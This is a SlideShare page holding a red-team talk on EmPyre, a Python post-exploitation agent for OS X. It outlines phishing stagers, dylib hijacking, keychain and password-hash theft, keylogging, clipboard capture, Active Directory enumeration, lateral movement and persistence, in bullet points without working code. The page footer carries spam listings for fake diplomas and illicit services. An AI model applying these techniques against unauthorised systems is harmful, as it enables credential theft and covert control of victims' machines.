SlideShare a Scribd company logo
1 of 52
Download to read offline
Building an
Empyre with
Python
@harmj0y
× Researcher/red teamer for the Adaptive Threat
Division
× Co-founder/active developer of the Veil-Framework |
PowerView | PowerUp | Empire
× Microsoft CDM/PowerShell MVP and active
PowerSploit developer
@424f424f
× U.S. Army Infrantry combat veteran
× Red teamer/Penetration Tester for the Adaptive
Threat Division
× Instructor for ATD’s “Adaptive Penetration Testing”
course
@killswitch_gui
× Previous US Army Soldier
× Red teamer/Penetration Tester for the Adaptive
Threat Division
× Developed SimplyEmail / SimplyTemplate
tl;dr
× Overview/”Why Build This”/RATs 101
× EmPyre
× Stagers
× Host/network triage
× Lateral movement
× Persistence
× The Future
× Demos throughout!
Why Build
this?
Motivations
× A high-security client wanted a penetration
test against their corporate infrastructure
× which was 80% OS X …
× We did our research and found very few options
for ‘complete’ OS X agents
× though small post-exploitation pieces did exist
Adversarial OS X
× WireLurker (Trojanized applications, Infects connected
ios devices)
× XcodeGhost (Infected xcode package in China)
× Hacking Team (Remote Code Systems compromise
platform)
× OceanLotus (Flash Dropper, download Mach-O binary)
× KeRanger (Ransomware, infected transmission package)
OS X Challenges
× Not nearly as many public OS X attack toolsets
out there as there are for Windows
× Access vectors are significantly more limited
than Windows as well
× Lateral spread is complicated a bit (no pth!)
RATS 101
× We have a number of broad design goals for our
solution:
× Staging flexibility
× Modularity
× (Reasonably) strong crypto
× The “Staging problem”
× Your malicious code has to SOMEHOW get to the target
Empyre
background
× Python agent and controller
× heavily based on the PowerShell Empire project
× OS X/Linux 2.7 and 2.6 compatible/“living off the land”
× Asynchronous communications (HTTP[s])
× Diffie-Hellman based Encrypted Key Exchange
× Variety of post-exploitation modules
Module development
× Like Empire, development is quick due to the
modular structure and use of a scripting
language
× Modules == metadata containers for an
embedded Python script
× Things like option sets, needs admin, opsec safe, save
file output, etc
stagers
OS X MAcros
× Works on
Office 2011
and below,
otherwise,
we’re stuck
in the...
Mach-o binaries
× Mach object file format for executables, object
code, shared libraries, dynamically-loaded code
and core dumps
× We hot-patch a binary with the EmPyre stager
code
× Binary contains the python interpreter
Dylib Hijacking
× Ported from @patrickwardle research
× https://www.virusbulletin.com/uploads/pdf/magazin
e/2015/vb201503-dylib-hijacking.pdf
× Abuses search-order loading
× Also a method of persistence in EmPyre
Hijack Scanner
Dylib Hiijacker
Demo: Phishing with EmPyre
Host
triage
Privilege escalation
× Users often run as admin
× Two prompt modules for credential collection:
× Mac app prompting - osascript
× Screensaver alleyoop - osascript / security
× Elevate using sudo_spawn to spawn a new
EmPyre agent
Privilege escalation
Chainbreaker
× Keychaindump (juuso)
× Keychain exploitable prior to OS X yosemite to
recover master key from memory
× Decrypt keychain store using master key candidate
× Keychaindump_chainbreaker (n0fate)
× Allows masterkey and password input for decryption
of entire keychain.
× Fully ported to allow on target dumps rather offline
Hashdumping
× Built in hashdump module:
× Sudo required of course
× Output is hashcat ready
× Hash format is unique to different OS X series
× 10.8 + uses Salted-SHA512-PBKDF2
× Password -> Iterations -> salt -> hash_pbkd2
× Ultimately very slow hash to crack (H/S)
Hashdumping
Keylogging
× Uses ruby adapted code from MSF:
× Captures and logs keystrokes to a file currently
× Runs as a separate ruby process
screenshots
× Currently supports two separate methods:
× Native - screenshot builtin tool
× Python - using Quartz API call’s
× Environment can dictate the use of native tools
× CGImageDestinationCreateWithUR() and
screenshot only allows a output path for image
Clipboard theft
× Great way to target and collect credentials
× Output to file or pipeline:
× Timed collection allows continues monitoring using
background jobs
× Uses non-native method via AppKit API:
× Native pbpaste may be signatured by Carbon Black
Demo: Host Triage with EmPyre
Network
situational
awareness
OS X is on the Domain Too!
× Admins want/need to:
× Enforce corporate policy via Group Policy
× Manage resources
× Manage users
× Advertise resources such as printers
× Benefit from single sign-on access to Active
Directory resources through Kerberos
OS X and LDAP
× ldapsearch tool
× opens a connection to an LDAP server, binds, and
performs a search using specified parameters
× dig -t SRV _ldap._tcp.example.com
PowerView, OS X Style
× Wanted to mimic the features of PowerSploit’s
PowerView to enumerate Active Directory
× Using ldapsearch, we can mimic “most”
features
× Unfortunately, creates a log entry for every
connection
Situational Awareness, AD Enumeration
× get_computers
× get_domaincontrollers
× get_fileservers
× get_groupmembers
× get_groupmemberships
× get_groups
× get_ous
× get_userinformation
× get_users
PowerView, OS X Style
Overpass-THE-HASH
× Original research by @gentilkiwi and
@obscuresec and OS X research by
@passingthehash
× Upgrading an NT hash into a full Kerberos ticket!
× Utilities
× kinit - acquire initial Kerberos credentials
× klist - list Kerberos credentials
× kdestroy - remove Kerberos credentials
Demo: Domain Enumeration with EmPyre
Lateral
Movement
Os x vs windows
× Common Windows lateral movement methods:
× WMI, PSEXEC, WinRM, Remote Desktop
× OS X disappoints a bit on this front...
× SSH is available but disabled by default
× WinEXE installed through HomeBrew are possible
× EmPyre modules:
× ssh_command / ssh_launcher
Web Service Exploitation
× JBoss exploit
× Pass exploit to Empire server
Persistence
Os x vs windows
× Common Windows persistence methods:
× Registry keys
× Startup folders
× WMI
× DLL hijacks
× Backdoor accounts
× OS X is also quite fruitful:
× Crontabs
× Loginhooks
× Daemons
× Dylib Hijacking
Crontabs, Daemons, and Login Hooks
× Login Hook - User Context
× Bash / Applescript / binary execution
× User or any user logon executes payload
× Sets com.apple.loginwindow
× Crontabs - User Context
× Requires Bash / Applescript / binary
× Timed execution of payload
× Great for continued access
× Launch Daemons - Root Context
× Requires sudo
× Spawns determined by XML manifest (reboot)
× Daemons (services) once started will restart upon agent loss
Persistence with Dylib Hijacking
× EmPyre implements @patrickwardle research
to scan for hijackable Dylibs!
× rPath search, WeakLib import search
× CreateHijacker module
× allows for quick exploitation
× ease of generating payload
× patching in the path to the legitimate Dylib for proper
execution
Questions?
@harmj0y / will [at] harmj0y.net
@424f424f / steveborosh [at] gmail.com
@killswitch_gui / a.rymdekoharvey [at] gmail.com

More Related Content

What's hot

Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseWill Schroeder
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conWill Schroeder
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 

What's hot (20)

I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackers
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the Empire
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44con
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 

Viewers also liked

BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersNikhil Mittal
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksBaronZor
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraftenigma0x3
 
Introduction to vSphere APIs Using pyVmomi
Introduction to vSphere APIs Using pyVmomiIntroduction to vSphere APIs Using pyVmomi
Introduction to vSphere APIs Using pyVmomiMichael Rice
 
Using a graph database for analyzing your Liferay data
Using a graph database for analyzing your Liferay dataUsing a graph database for analyzing your Liferay data
Using a graph database for analyzing your Liferay dataMáté Thurzó
 
Python Hype June
Python Hype JunePython Hype June
Python Hype JuneBrian Ray
 

Viewers also liked (13)

BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
 
Malvertizing Like a Pro
Malvertizing Like a ProMalvertizing Like a Pro
Malvertizing Like a Pro
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
Workshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration TestersWorkshop: PowerShell for Penetration Testers
Workshop: PowerShell for Penetration Testers
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto Attacks
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 
Introduction to vSphere APIs Using pyVmomi
Introduction to vSphere APIs Using pyVmomiIntroduction to vSphere APIs Using pyVmomi
Introduction to vSphere APIs Using pyVmomi
 
Using a graph database for analyzing your Liferay data
Using a graph database for analyzing your Liferay dataUsing a graph database for analyzing your Liferay data
Using a graph database for analyzing your Liferay data
 
Hello World! with Python
Hello World! with PythonHello World! with Python
Hello World! with Python
 
Python Hype June
Python Hype JunePython Hype June
Python Hype June
 

Similar to Building an EmPyre with Python

Containers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingContainers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingDmitry Spodarets
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangChris McEniry
 
Machine learning in cybersecutiry
Machine learning in cybersecutiryMachine learning in cybersecutiry
Machine learning in cybersecutiryVishwas N
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
 
Deep Learning을 위한 AWS 기반 인공 지능(AI) 서비스 (윤석찬)
Deep Learning을 위한  AWS 기반 인공 지능(AI) 서비스 (윤석찬)Deep Learning을 위한  AWS 기반 인공 지능(AI) 서비스 (윤석찬)
Deep Learning을 위한 AWS 기반 인공 지능(AI) 서비스 (윤석찬)Amazon Web Services Korea
 
Scaleable PHP Applications in Kubernetes
Scaleable PHP Applications in KubernetesScaleable PHP Applications in Kubernetes
Scaleable PHP Applications in KubernetesRobert Lemke
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010Chris Gates
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniquesSymantec Security Response
 
Linux containers and docker
Linux containers and dockerLinux containers and docker
Linux containers and dockerFabio Fumarola
 
Security Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and ResultsSecurity Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and ResultsIgor Beliaiev
 
Sugar and Spice - linking SugarCRM with Funambol
Sugar and Spice - linking SugarCRM with FunambolSugar and Spice - linking SugarCRM with Funambol
Sugar and Spice - linking SugarCRM with FunambolFunambol
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Sysdig
 
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...PranavPatil822557
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingCTruncer
 
Malware analysis
Malware analysisMalware analysis
Malware analysisxabean
 
2012-03-15 What's New at Red Hat
2012-03-15 What's New at Red Hat2012-03-15 What's New at Red Hat
2012-03-15 What's New at Red HatShawn Wells
 
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP EcosystemWhat is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP Ecosystemsparkfabrik
 

Similar to Building an EmPyre with Python (20)

HackMiami-Final
HackMiami-FinalHackMiami-Final
HackMiami-Final
 
Containers for Science and High-Performance Computing
Containers for Science and High-Performance ComputingContainers for Science and High-Performance Computing
Containers for Science and High-Performance Computing
 
Electron
ElectronElectron
Electron
 
On the Edge Systems Administration with Golang
On the Edge Systems Administration with GolangOn the Edge Systems Administration with Golang
On the Edge Systems Administration with Golang
 
Machine learning in cybersecutiry
Machine learning in cybersecutiryMachine learning in cybersecutiry
Machine learning in cybersecutiry
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
 
Deep Learning을 위한 AWS 기반 인공 지능(AI) 서비스 (윤석찬)
Deep Learning을 위한  AWS 기반 인공 지능(AI) 서비스 (윤석찬)Deep Learning을 위한  AWS 기반 인공 지능(AI) 서비스 (윤석찬)
Deep Learning을 위한 AWS 기반 인공 지능(AI) 서비스 (윤석찬)
 
P05-slides
P05-slidesP05-slides
P05-slides
 
Scaleable PHP Applications in Kubernetes
Scaleable PHP Applications in KubernetesScaleable PHP Applications in Kubernetes
Scaleable PHP Applications in Kubernetes
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
Linux containers and docker
Linux containers and dockerLinux containers and docker
Linux containers and docker
 
Security Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and ResultsSecurity Walls in Linux Environment: Practice, Experience, and Results
Security Walls in Linux Environment: Practice, Experience, and Results
 
Sugar and Spice - linking SugarCRM with Funambol
Sugar and Spice - linking SugarCRM with FunambolSugar and Spice - linking SugarCRM with Funambol
Sugar and Spice - linking SugarCRM with Funambol
 
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
 
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
Machine Learning , Analytics & Cyber Security the Next Level Threat Analytics...
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
2012-03-15 What's New at Red Hat
2012-03-15 What's New at Red Hat2012-03-15 What's New at Red Hat
2012-03-15 What's New at Red Hat
 
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP EcosystemWhat is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
 

More from Will Schroeder

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfWill Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 

More from Will Schroeder (8)

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Certified Pre-Owned
Certified Pre-OwnedCertified Pre-Owned
Certified Pre-Owned
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 

Recently uploaded

SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...
SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...
SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...Varun Mithran
 
Washington Football Commanders Redskins Feathers Shirt
Washington Football Commanders Redskins Feathers ShirtWashington Football Commanders Redskins Feathers Shirt
Washington Football Commanders Redskins Feathers Shirtrahman018755
 
HUMANIZE YOUR BRAND - FREE E-WORKBOOK Download Now
HUMANIZE YOUR BRAND - FREE E-WORKBOOK Download NowHUMANIZE YOUR BRAND - FREE E-WORKBOOK Download Now
HUMANIZE YOUR BRAND - FREE E-WORKBOOK Download NowIdeoholics
 
Beyond Inbound: Unlocking the Secrets of API Egress Traffic Management
Beyond Inbound: Unlocking the Secrets of API Egress Traffic ManagementBeyond Inbound: Unlocking the Secrets of API Egress Traffic Management
Beyond Inbound: Unlocking the Secrets of API Egress Traffic Managementseank14
 
一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理AS
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at  CaribNOG 27APNIC Updates presented by Paul Wilson at  CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27APNIC
 
VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...
VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...
VIP ℂall Girls Bangalore 8250077686 WhatsApp: Me All Time Serviℂe Available D...Model Neeha Mumbai
 
原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样AS
 
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理
一比一原版(TRU毕业证书)温哥华社区学院毕业证如何办理Fir
 
Thank You Luv I’ll Never Walk Alone Again T shirts
Thank You Luv I’ll Never Walk Alone Again T shirtsThank You Luv I’ll Never Walk Alone Again T shirts
Thank You Luv I’ll Never Walk Alone Again T shirtsrahman018755
 
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC
 
原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样
原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样
原版定制(Glasgow毕业证书)英国格拉斯哥大学毕业证原件一模一样AS
 
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书Fir
 
一比一原版英国创意艺术大学毕业证如何办理
一比一原版英国创意艺术大学毕业证如何办理一比一原版英国创意艺术大学毕业证如何办理
一比一原版英国创意艺术大学毕业证如何办理AS
 
如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证
如何办理(UCLA毕业证)加州大学洛杉矶分校毕业证成绩单本科硕士学位证留信学历认证hfkmxufye
 
I’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 ShirtI’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 Shirtrahman018755
 
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...musaddumba454
 
原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样原版定制美国加州大学河滨分校毕业证原件一模一样
原版定制美国加州大学河滨分校毕业证原件一模一样A
 
The Rise of Subscription-Based Digital Services.pdf
The Rise of Subscription-Based Digital Services.pdfThe Rise of Subscription-Based Digital Services.pdf
The Rise of Subscription-Based Digital Services.pdfe-Market Hub
 

Recently uploaded (20)

SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...
SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...
SOC Analyst Guide For Beginners SOC analysts work as members of a managed sec...
 
Washington Football Commanders Redskins Feathers Shirt
Washington Football Commanders Redskins Feathers ShirtWashington Football Commanders Redskins Feathers Shirt
Washington Football Commanders Redskins Feathers Shirt
 
HUMANIZE YOUR BRAND - FREE E-WORKBOOK Download Now
HUMANIZE YOUR BRAND - FREE E-WORKBOOK Download NowHUMANIZE YOUR BRAND - FREE E-WORKBOOK Download Now
HUMANIZE YOUR BRAND - FREE E-WORKBOOK Download Now
 
Beyond Inbound: Unlocking the Secrets of API Egress Traffic Management
Beyond Inbound: Unlocking the Secrets of API Egress Traffic ManagementBeyond Inbound: Unlocking the Secrets of API Egress Traffic Management
Beyond Inbound: Unlocking the Secrets of API Egress Traffic Management
 
一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
